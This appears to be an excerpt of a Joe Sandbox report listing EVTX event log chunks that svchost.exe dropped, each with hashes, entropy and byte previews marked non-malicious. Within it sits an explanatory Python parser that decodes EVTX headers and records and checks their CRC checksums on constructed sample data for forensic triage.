                                                      SSDEEP:768:ELjpPv++M48PFVbUa+5DdDLjpPv++M48PFVbUa+5DdyY20sMY3Dp13/n/ydIxm6c:TU
                                                      MD5:9550348718E36BF2728FAD844B7E4F7D
                                                      SHA1:9E1EBA342A62B2E8415B10ADA70134D47C25E5A7
                                                      SHA-256:71A44332B4E178246D35CC2D0646813E9EEB5AD883FD6602C15C14384B091B3A
                                                      SHA-512:77FEC5CD31656DE999002CADA163115D414D7DFD60DCCB6A2CA34E3E262A65505D42F4BAB15F70F51227B8AF24F970A7D453A6D3B40A0E6AEB123989280376F8
                                                      Malicious:false
                                                      Preview:ElfFile.....................................................................................................................I..ElfChnk......................................$...(...\.d....................................................................D.2v................H.......................p...=...........................................................................................................................f...............?...........................m...................M...F...........................................................&.......!............................................$..................................**..X.............................&...........|B._..Q=;C9.........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d.
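The dropped files listed above are Windows XML Event Log (EVTX) structures written by the svchost.exe process: each 65536-byte "data" file begins with the ElfChnk signature and is a single EVTX chunk (a chunk is always 64 KiB), while the 76040-byte file begins with the ElfFile signature, which file(1) recognises and renders as the "MS Windows Vista Event Log, 2 chunks (no. 1 in use), next record no. 143, DIRTY" line; file(1) has no rule for a bare chunk, hence "data". The parser below is an added example, not part of the Joe Sandbox report or of any tool it lists. It decodes both headers, reproduces the File Type line from the header fields, verifies the two CRC32 checksums a chunk carries, and walks the record headers to list record identifiers and FILETIME timestamps. Field offsets follow the EVTX layout as documented by libevtx; the chunk and header it runs on are constructed inside the block (record bodies are placeholder strings, not real BinXML, and the timestamp is an assumed value), so it runs offline.

```python
# Added example (not part of the Joe Sandbox report): decode the EVTX structures behind the
# dropped-file entries above. Layout per the libevtx format documentation; sample data is constructed.
import struct
import zlib
from datetime import datetime, timedelta, timezone

ELF_FILE = b"ElfFile\x00"            # 4096-byte file header; file(1) reports it as "MS Windows Vista Event Log"
ELF_CHNK = b"ElfChnk\x00"            # 65536-byte chunk; file(1) has no rule for a bare chunk and prints "data"
RECORD_MAGIC = b"\x2a\x2a\x00\x00"   # "**\0\0", the start of every event record
CHUNK_SIZE = 0x10000
FLAG_DIRTY, FLAG_FULL = 0x1, 0x2
EPOCH = datetime(1601, 1, 1, tzinfo=timezone.utc)

def filetime_to_datetime(ft):
    """Windows FILETIME (100 ns ticks since 1601-01-01 UTC) to an aware datetime."""
    return EPOCH + timedelta(microseconds=ft // 10)

def datetime_to_filetime(dt):
    return ((dt - EPOCH) // timedelta(microseconds=1)) * 10

def describe_file_header(buf):
    """Decode an ElfFile header; 'description' mirrors the File Type line file(1) prints."""
    if buf[:8] != ELF_FILE:
        raise ValueError("not an ElfFile header")
    _, last_chunk, next_record_id = struct.unpack_from("<QQQ", buf, 8)   # first chunk, last chunk, next id
    header_size, minor, major, block_size, num_chunks = struct.unpack_from("<IHHHH", buf, 32)
    flags, checksum = struct.unpack_from("<II", buf, 120)
    desc = (f"MS Windows Vista Event Log, {num_chunks} chunks (no. {last_chunk} in use), "
            f"next record no. {next_record_id}")
    if flags & FLAG_DIRTY:
        desc += ", DIRTY"   # header not flushed yet: the log was still open when the file was captured
    if flags & FLAG_FULL:
        desc += ", FULL"
    return {"description": desc, "version": (major, minor), "sane": header_size == 128 and block_size == 4096,
            "header_crc_ok": zlib.crc32(buf[:120]) == checksum}

def parse_chunk(chunk):
    """Decode an ElfChnk header, verify both CRC32s and walk the event record headers."""
    if chunk[:8] != ELF_CHNK:
        raise ValueError("not an ElfChnk chunk")
    (first_num, last_num, first_id, last_id, header_size,
     last_rec_off, free_off, records_crc) = struct.unpack_from("<QQQQIIII", chunk, 8)
    checksum = struct.unpack_from("<I", chunk, 124)[0]
    records, off = [], 512   # records follow the 128-byte header and the string/template tables
    while off + 28 <= free_off and chunk[off:off + 4] == RECORD_MAGIC:
        size, rec_id, written = struct.unpack_from("<IQQ", chunk, off + 4)
        if size < 28 or off + size > free_off:
            break            # truncated record: stop instead of reading past the used area
        size_copy = struct.unpack_from("<I", chunk, off + size - 4)[0]
        records.append({"id": rec_id, "written": filetime_to_datetime(written),
                        "size": size, "intact": size_copy == size})
        off += size
    return {"record_ids": (first_id, last_id), "record_numbers": (first_num, last_num),
            "last_record_offset": last_rec_off, "free_space_offset": free_off, "records": records,
            "header_crc_ok": zlib.crc32(chunk[:120] + chunk[128:512]) == checksum,
            "records_crc_ok": zlib.crc32(chunk[512:free_off]) == records_crc}

def build_record(rec_id, written, payload):
    size = 4 + 4 + 8 + 8 + len(payload) + 4   # magic, size, id, FILETIME, body, size copy
    return (RECORD_MAGIC + struct.pack("<IQQ", size, rec_id, datetime_to_filetime(written))
            + payload + struct.pack("<I", size))

def build_chunk(entries):
    """Constructed chunk from (record_id, written, payload) tuples; payloads stand in for BinXML."""
    body = b"".join(build_record(*e) for e in entries)
    chunk = bytearray(CHUNK_SIZE)
    chunk[0:8], chunk[512:512 + len(body)] = ELF_CHNK, body
    last_off = 512 + len(body) - len(build_record(*entries[-1]))
    struct.pack_into("<QQQQIIII", chunk, 8, entries[0][0], entries[-1][0], entries[0][0],
                     entries[-1][0], 128, last_off, 512 + len(body), zlib.crc32(body))
    struct.pack_into("<I", chunk, 124, zlib.crc32(bytes(chunk[:120]) + bytes(chunk[128:512])))
    return bytes(chunk)

def build_file_header(num_chunks, last_chunk, next_record_id, flags):
    hdr = bytearray(4096)
    hdr[0:8] = ELF_FILE
    struct.pack_into("<QQQIHHHH", hdr, 8, 0, last_chunk, next_record_id, 128, 1, 3, 4096, num_chunks)
    struct.pack_into("<I", hdr, 120, flags)
    struct.pack_into("<I", hdr, 124, zlib.crc32(bytes(hdr[:120])))
    return bytes(hdr)

def tampered(chunk, offset=540):
    c = bytearray(chunk)
    c[offset] ^= 0x01        # flip one byte inside the first record's body: the records CRC must then fail
    return bytes(c)

# Constructed sample: two records in one chunk, plus a file header whose fields reproduce
# the "2 chunks (no. 1 in use), next record no. 143, DIRTY" File Type line above.
T0 = datetime(2024, 10, 18, 12, 0, 0, tzinfo=timezone.utc)   # assumed timestamp
SAMPLE_CHUNK = build_chunk([(141, T0, b"<Event>constructed record 141</Event>"),
                            (142, T0 + timedelta(seconds=5), b"<Event>constructed record 142</Event>")])
SAMPLE_FILE_HEADER = build_file_header(num_chunks=2, last_chunk=1, next_record_id=143, flags=FLAG_DIRTY)

if __name__ == "__main__":
    print(describe_file_header(SAMPLE_FILE_HEADER)["description"])
    for r in parse_chunk(SAMPLE_CHUNK)["records"]:
        print(r["id"], r["written"].isoformat(), r["size"], r["intact"])
```

To triage one of the dropped chunks, read its 65536 bytes and pass them to parse_chunk. A chunk whose records still parse but whose records_crc_ok is False has had bytes changed after the header was written; on a file captured mid-write by the sandbox that can be an ordinary partial flush, but on a log at rest it is worth a closer look. The DIRTY flag in the file header has the same caveat: it only says the Event Log service had not yet closed the file when the copy was taken.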
                                                      Process:C:\Windows\System32\svchost.exe
                                                      File Type:data
                                                      Category:dropped
                                                      Size (bytes):65536
                                                      Entropy (8bit):5.718426658668259
                                                      Encrypted:false
                                                      SSDEEP:384:Thka5Ka5WsR9o2KbzyzIz7a5NsR9o2KbzyzIzia5zzuzNz0zxzuewKWMK/2a55wt:Tdqlt94xODljQdM
                                                      MD5:8630011707C7BFBCECC0A9430637802E
                                                      SHA1:22247A5B6A4C01883BB14E0BD4575A3553F945CB
                                                      SHA-256:227057F9899098B21709D53114E9DECFFCD28207BFFA178AD6B1E32F9C63EDDF
                                                      SHA-512:972629871B28EA6D01B8762B28378F8348E592BD465FE7FD1CF6AB5BD62157230AD3BB729F6290F6EDA950AB20598110676D902756E40BA3067ED37831855076
                                                      Malicious:false
                                                      Preview:ElfChnk.%......./.......%......./...........(l...n.........................................................................b\.;................ .......................H...=...........................................................................................................................f...............?...........................m...................M...F...............................................................................................................&........................6..........**..P...%.......'wu~..............&............"3WI..L..........A..|...M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....
                                                      Process:C:\Windows\System32\svchost.exe
                                                      File Type:data
                                                      Category:dropped
                                                      Size (bytes):65536
                                                      Entropy (8bit):0.9963080376858662
                                                      Encrypted:false
                                                      SSDEEP:384:l7h1hM7MpMEaMWFMu/Ma2M+AMmGM1cMNF3Mg9Ml7MABMczM0cMKhMLaMA0MJvMZy:l7eJw
                                                      MD5:A51AFE78FA4481FA05EDC1133C92B1D8
                                                      SHA1:5BA44E7A99EE615E323696742DA6B930E9FF6198
                                                      SHA-256:44C1977D16383DF6B1FFF8164F319DFD99092A124ABA7C7280D74A6BB8AD2094
                                                      SHA-512:792E5E8F5540DCA4B7F003C1043DCBC3E0EC3F23EC4A7B0FA84357F6ABDFD84122C124DBEA2B61D3B5CEED79A3E158DBE95DFCDB20EEAC433D9CDC29C3328F22
                                                      Malicious:false
                                                      Preview:ElfChnk......................................)..0-....\.....................................................................|..........................................>...=...........................................................................................................................f...............?...........................m...................M...F...........................&....................................................................................)..................................**..............c...............&............MVy...o.~........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....
                                                      Process:C:\Windows\System32\svchost.exe
                                                      File Type:data
                                                      Category:dropped
                                                      Size (bytes):65536
                                                      Entropy (8bit):4.076996627399968
                                                      Encrypted:false
                                                      SSDEEP:384:Ihk1EL1I1Vh1C1D161f1f181L1tY1VGm1Q1L1p1VG1U1Z1s1VA141c1Vc1q1tS12:IBjdjP0cs6N
                                                      MD5:A8ADBDC2B39B55444B2C844F7D81EBDE
                                                      SHA1:F97F40E314C8A2A39953A28CB72C9270D3073418
                                                      SHA-256:93CF0EF4C121FCBB18A8A6DA5912415AF1113816BE6A8F9B86BE6A2243408E09
                                                      SHA-512:922D165CBE871A393D58DAABABE7D09557E242BF73C2C473C29CCB0FB3277B8119911EFF51B12238D23B613AD9C15DAB163C9757BC9006D768B2345F53436E7B
                                                      Malicious:false
                                                      Preview:ElfChnk.........................................X...Y}.......................................................................(.[................>.......................f...=...........................................................................................................................f...............?...........................m...................M...F...........................................................&...............................A.......................................................**..............*5.8..............&...........|B._..Q=;C9.........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....
                                                      Process:C:\Windows\System32\svchost.exe
                                                      File Type:data
                                                      Category:dropped
                                                      Size (bytes):83408
                                                      Entropy (8bit):3.465895899791719
                                                      Encrypted:false
                                                      SSDEEP:384:3KILbwI+IUIyI2I4bXImLIjcMIRI9IJIoINIcIcFIuIQITI4IYIDvHIZIDhhDIEu:3TrxhZxGp99r
                                                      MD5:700E6D05B3FC566FEF16966161DEF5A5
                                                      SHA1:ABC0B9E9B627412AA777AB071FEA0D1D7DD0CD7E
                                                      SHA-256:2416AD57DCEAD470B1DD3054229786FF429C5A1167637C1859C1D04ED6888A15
                                                      SHA-512:8DD1B3D4CCA3037374ED650CEC59A07B88C95C7386BCE3AF6EF416FE4490F6CA5A7671259ADD88A52E2E13E89EEBE79197FA4FF66E72F3D3A14A0D3CE7E5AC54
                                                      Malicious:false
                                                      Preview:ElfChnk.T...............T...................P...h...[.........................................................................G........................................>...=...........................................................................................................................f...............?...........................m...................M...F............................................................n..................1................................a......a...........................**......z...........!.............a..............................................................,.......D.....!........... ....@....!....&O....h!'O............z....................M.i.c.r.o.s.o.f.t.-.W.i.n.d.o.w.s.-.N.t.f.s..z.?..nM.......M.i.c.r.o.s.o.f.t.-.W.i.n.d.o.w.s.-.N.t.f.s./.O.p.e.r.a.t.i.o.n.a.l........n..&.......6p.\.#i....>..........2........A..=...>.../....=.......V.o.l.u.m.e.C.o.r.r.e.l.a.t.i.o.n.I.d.......A..7...>...)....=.......V.o.l.u.m.e.N.a.m.e.L.e.n.g.t.h....
                                                      Process:C:\Windows\System32\svchost.exe
                                                      File Type:data
                                                      Category:dropped
                                                      Size (bytes):65536
                                                      Entropy (8bit):0.801423310886069
                                                      Encrypted:false
                                                      SSDEEP:384:dh6iIvcImIvITIQIoIoI3IEIMIoIBIDIcIwISIEzIJVI:doxJS
                                                      MD5:9EAAD7982F42DFF47B8EF784DD2EE1CC
                                                      SHA1:542608204AF6B709B06807E9466F7543C0F08818
                                                      SHA-256:5468A48533B56DE3E8C820B870493154775356CE3913AD70EC51E0D1D0D1A366
                                                      SHA-512:036BFABE2AC4AD623B5C439349938C0EA254BFCDAB9096A53253189D4F632A8A8A1DD00644A4573AF971AAEA6831317BFD663E35363DD870684CDD4C0A51884C
                                                      Malicious:false
                                                      Preview:ElfChnk.....................................X ...#..\.N......................................................................12.............................................=...........................................................................................................................f...............?...........................m...................M...F...........................&...................................................................................~ ..................................**..............................&............MVy...o.~........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....
                                                      Process:C:\Windows\System32\svchost.exe
                                                      File Type:data
                                                      Category:dropped
                                                      Size (bytes):65536
                                                      Entropy (8bit):2.996272372482282
                                                      Encrypted:false
                                                      SSDEEP:768:e4u1n8zfFFU1x4Dk13xIb13xIb13xIt13xIi13xI513xIU13xI013xIF13xIH137:M
                                                      MD5:4F68D6AF0C7DB9E98F8B592C9A07811C
                                                      SHA1:9F519109344DD57150F16B540AAA417483EF44FE
                                                      SHA-256:44177E6F71E240EBFE9CE63FEFBF5D46A01979E09C0C14F65F1D19AE8E97B8EE
                                                      SHA-512:E1D5097BCD572F3DBAF4024FAEA76BAD3061CD2E05017701B578020327969C2BD3F725FBE8BFE4C40DC66336CE1371E7AB037058603B02449366DAE4EDE8DE69
                                                      Malicious:false
                                                      Preview:ElfChnk.....................................(...8...S......................................................................V..C................(.......................P...=...........................................................................................................................f...............?...........................m...................M...F...........................&................................ ..................................................N...................................**...............................&............MVy...o.~........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....
                                                      Process:C:\Windows\System32\svchost.exe
                                                      File Type:data
                                                      Category:dropped
                                                      Size (bytes):69752
                                                      Entropy (8bit):3.7922843548336367
                                                      Encrypted:false
                                                      SSDEEP:768:YNYNwutDBjV8k+PS7eUtHpoVWWB07SZRcZv76NcRUjGHzLKvc90XKcZv76NcRkpI:UUwutDBjV8k+67PtHpoVW
                                                      MD5:BFB69ACAD0D04FB62869D07A7A74DBA6
                                                      SHA1:4A880A73E618177CACBAE617F19E77042946379F
                                                      SHA-256:D09BF5087852F5E082CB778ABC33E0648AB5FEA32448C70EF1EF93595B774E33
                                                      SHA-512:722D0E862B9A5A7865B77CF2DC484E18D0FC7F39D9CC1075E9BEA4CAA57E1B87340DF83A3D452CEF4D99A40D164A8A49A5A3A3ABB919927E70B7190F86208EBF
                                                      Malicious:false
                                                      Preview:ElfChnk.................O.......T...............x...^.........................................................................;................0...........................=...........................................................................................................................f...............?...........................m...................M...F...............................................................................................................&...................................**..`...O.........I..!............&............"3WI..L..........A..|...M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....
                                                      Process:C:\Windows\System32\svchost.exe
                                                      File Type:data
                                                      Category:dropped
                                                      Size (bytes):65536
                                                      Entropy (8bit):4.738711518598647
                                                      Encrypted:false
                                                      SSDEEP:384:Fh+rKvKaKNP6WKkvKWKlpKuyK7YKmKaKHxqKWyK11KUIKqKq9KLjK5yKoKfKYKnJ:FkN2cTOsKZDY7aVZc55NrjzDbRt
                                                      MD5:0C63074367EB5912D1369160BE13D49C
                                                      SHA1:68E877CAB4808ADE17B417228BBCF54B40FFE17A
                                                      SHA-256:7DC3C2F901D6C8EFF78E6CAFF4496946402539B27A9FE10161BEBC250EA3CAE4
                                                      SHA-512:7DE89DFDD7D143C50F0C28EE675836911DE6FD7C861D25017A7362750C82C24EE8785F758D2F7B2CA10A7562B30B49F31842000994788F18B3CEE244E293CBA4
                                                      Malicious:false
                                                      Preview:ElfChnk.....................................0.........e ......................................................................3B................l...........................=...........................................................................................................................f...............?...........................m...................M...F.......................E................................M..&...g`..g5......................o]...........X...Z..GP...............s......od......_i..**..P............%.o..............&...........|B._..Q=;C9.........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....
                                                      Process:C:\Windows\System32\svchost.exe
                                                      File Type:data
                                                      Category:dropped
                                                      Size (bytes):65536
                                                      Entropy (8bit):0.7590316238843728
                                                      Encrypted:false
                                                      SSDEEP:384:IhP8o8Z85848V8M8g8D8R8E8T8h8p8TtP8sU8:Ic
                                                      MD5:B074238315662886E2BD70106D08A747
                                                      SHA1:5ADA158D19401565E76349FCA97489E9FB9BFA36
                                                      SHA-256:53770508DCDA0199A75458B5A10DC8FD2E49A4CFD0FC001C16D56F3B567AB71C
                                                      SHA-512:9D35DC04CCE95541551254BCBB00B0E2E0860D9B6F69D40FBC829DA31FC3AC43690A049A432BA4D43315B80675143A6AA02C57484E7903845010A5AD9EC92D6D
                                                      Malicious:false
                                                      Preview:ElfChnk.........................................0!....H.......................................................................j........................................V...=...........................................................................................................................f...............?...........................m...................M...F...........................................................&.......................................................................................**..(.............................&...........|B._..Q=;C9.........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....
                                                      Process:C:\Windows\System32\svchost.exe
                                                      File Type:data
                                                      Category:dropped
                                                      Size (bytes):65536
                                                      Entropy (8bit):3.7512621807969166
                                                      Encrypted:false
                                                      SSDEEP:1536:GXhKUyS+z1VV18o838c8bUc8cVVsz8VX8SoX8aA8cmtpjAiVB18dwE4vjcYoMjn1:GXwnS
                                                      MD5:13D614B9F0C0052F70E23F561AEF8DB0
                                                      SHA1:6B662ACF83D025FEBFF82FAEF8E55A8C9925F585
                                                      SHA-256:ECEB87E73BE1FD6D62C7586A10955079D7178E613FE80800FFE3AD861CE8A41E
                                                      SHA-512:AE9F250A690D23FABE8AEF257F8D8AC93FF0D4BD05C8A1FC3E0404E13215F51AC4F699293A886FC0D7EB397A0D26D4F8864B41AD89E739888138B30CE1C517D0
                                                      Malicious:false
                                                      Preview:ElfChnk.........%...............%............E..`G..gF........................................................................................v...........................=...........................................................................................................................f...............?...........................m...................M...F...........................................................&...................................................&B..........O.......................**..............g5...............&...........|B._..Q=;C9.........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....
                                                      Process:C:\Windows\System32\svchost.exe
                                                      File Type:data
                                                      Category:dropped
                                                      Size (bytes):65536
                                                      Entropy (8bit):2.3069197485541766
                                                      Encrypted:false
                                                      SSDEEP:768:S0VsLY/Z5aFka2aKazzabCafama5Sa0ra6rzaJcavkao9O0apPaQOan6qa6IvV1:ycEu
                                                      MD5:E6E4C860CE7DD1BB499D6A082B461B90
                                                      SHA1:11330861B23B1D29D777D9BD10619A07B6A6A9C0
                                                      SHA-256:C27431D9C64F5C9D323E2B4ED5F44781969B34F30DC4280296A329DCD6509D44
                                                      SHA-512:7393A0FF290BB3DB07E8BB9A9FA7B666CD8B686CBDAA3FED2EBD704D6E88A4D5768D104BD768E6AA533C42588C661A863E11ED9146ABD7386A2A9B4F84583406
                                                      Malicious:false
                                                      Preview:ElfChnk.........;...............;............r..@t...H......................................................................p"..................Q...........................=...........................................................a...............................................................f...............?...2...........................................M...F...........................*...........&........................................................................l..............]...................**.............._.............X..&.......X...],T.'tB..E........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....
                                                      Process:C:\Windows\System32\svchost.exe
                                                      File Type:data
                                                      Category:dropped
                                                      Size (bytes):127536
                                                      Entropy (8bit):4.000608545990872
                                                      Encrypted:false
                                                      SSDEEP:768:ah0w+qLpBVi7CPME79nCxkSqPh0w+qLpBVi7CPME79nCxkSqHe:c0w+qtBVi20w+qtBVi4e
                                                      MD5:ADECFB997F941FEFCA0239F8FF7CC750
                                                      SHA1:32E6AEED405410A5BCEC540CA7D8B019417CC85C
                                                      SHA-256:C4180B31B961C7479B8A3AAB841E13B06A6B5AC8DAE1CDB7F89FCF258A70D338
                                                      SHA-512:D917A9DA07BDC78815EEA54512652AA5E57C201BECB631E31B43AABA4550DCF474448E597CE4D1C4256FC9B822BEFB2321F8BD7783FDFD482846E0669925E189
                                                      Malicious:false
                                                      Preview:ElfChnk.........#...............#........... ..............................................................................\.*f................T.......................|...=...........................................................................................................................f...............?...........................m...................M...F.......................................-...'...............&.......................................................................................**.. ............#................&...........|B._..Q=;C9.........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....
                                                      Process:C:\Windows\System32\svchost.exe
                                                      File Type:data
                                                      Category:dropped
                                                      Size (bytes):65536
                                                      Entropy (8bit):4.2909571978750325
                                                      Encrypted:false
                                                      SSDEEP:384:Ny2/hDGCyCkCzCRCFCNClCuC6CoC9rC6CdCsCvCkxCkC5CCCWCxCIC/CbCFC5CkG:Ny2/dm1sR
                                                      MD5:B0BF4D9EC91ABBDA5D328631B125A5C0
                                                      SHA1:E672D69127AE7C1A51046ADAA911871EC0C10ABB
                                                      SHA-256:8DBE6F5B80B3D973BBF1177BCCAA690B9F90FC99DC358B7DE66175317C733501
                                                      SHA-512:3132E1FCC5C8F88BD974465EA1E644CA89C2D9E041E49F8A1F48B9ACB3376F0A1042F5CB6FDFC6BE2934C4483312C35539D64DB25B892388604F9F637074BCBD
                                                      Malicious:false
                                                      Preview:ElfChnk.U.......~.......U.......~....................}/.....................................................................@..................F.......................n...=...........................................................................................................................f...............?...........................m...................M...F...........................................................&....................................................v..................................**..0...U.........Df..............&...........|B._..Q=;C9.........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....
                                                      Process:C:\Windows\System32\svchost.exe
                                                      File Type:data
                                                      Category:dropped
                                                      Size (bytes):65536
                                                      Entropy (8bit):4.488768580471203
                                                      Encrypted:false
                                                      SSDEEP:1536:Q9YcieRoUlafdbkKKMAQ2SomvXCQv/2ketsvQPh8YzSJoh2VgPIEF6uq9GgCVRlW:Q9YcieRoUlaFbkKKMAQ2SomvXCM/2keU
                                                      MD5:E3FB1708C64D250E4D801AFB8688DF35
                                                      SHA1:8B889F0358683733257411E451A86E3A1D42159D
                                                      SHA-256:0B62FDD9A57B1809D79561AE64BE30DD7430815D6954A5E3DF90E29E1B2E6C72
                                                      SHA-512:2F5CC514B180A39E5961452A594FE5384A6369CBCB7A1CEBAC37948770A6CB999A2E2F26A32240058D5D7A335904DAF40C88F1C096D8F85907F23E9B32E79ABE
                                                      Malicious:false
                                                      Preview:ElfChnk.........$...............$.....................w.........................................................................................>.......................f...=...........................................................................................................................f...............?...........................m...................M...F...........................................................&...................................................V...................................**................o...............&...........|B._..Q=;C9.........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....
                                                      Process:C:\Windows\System32\svchost.exe
                                                      File Type:data
                                                      Category:dropped
                                                      Size (bytes):65536
                                                      Entropy (8bit):4.494709482922509
                                                      Encrypted:false
                                                      SSDEEP:1536:AcRFkL1TWX0gkB/J7oasEfyk2/vKlqRi/PgTZSXwyvy8fJpfrAW+Cr6SXlUr20Gy:AcRFkL1TWX0gkB/J7oasEfyk2/vKlqk6
                                                      MD5:32526484E49E60D3FAF9995A13AC2F71
                                                      SHA1:93D0E66F9A41D4FC664DABD03799CA34FE4A3219
                                                      SHA-256:18A7EFF2A12DFFD66083469060E273155F37CFA93FDBF35D07ACE2CAFEC825D4
                                                      SHA-512:882FD6184CB3CAA36AB067441983E9D4C4E6484637DB8636C111645886B17E1EE1B4C6704736E6379F50DA8540841863674D97D21898670DF6E1E8804C851F27
                                                      Malicious:false
